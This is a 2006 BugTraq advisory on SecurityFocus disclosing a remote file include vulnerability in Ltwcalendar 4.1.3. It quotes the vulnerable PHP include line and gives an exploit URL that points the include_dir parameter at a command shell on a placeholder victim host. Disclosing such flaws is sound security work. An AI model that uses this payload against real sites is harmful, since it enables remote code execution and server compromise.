BugTraq
Ltwcalendar 4.1.3 version - Remote File Include Vulnerabilities Jun 13 2006 04:15PM
SpC-x Bsdmail org
# SaVSaK.CoM | SpC-x - The_BeKiR |

# Ltwcalendar 4.1.3 version - Remote File Include Vulnerabilities

# Risk : High

# Class: Remote

# Script : Ltwcalendar

# Credits : SpC-x

# Thanks : The_BeKiR - Ejder - FasTBoY - ERNE - RMx

# Code :

# require_once('./private/ltw_config.php'); require_once($ltw_config['include_dir'].'/ltw_classes.php');

# Vulnerable :

# http://www.victim.com/Ltwcalendar/calendar.php?ltw_config[include_dir]=C
ommand-Shell

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus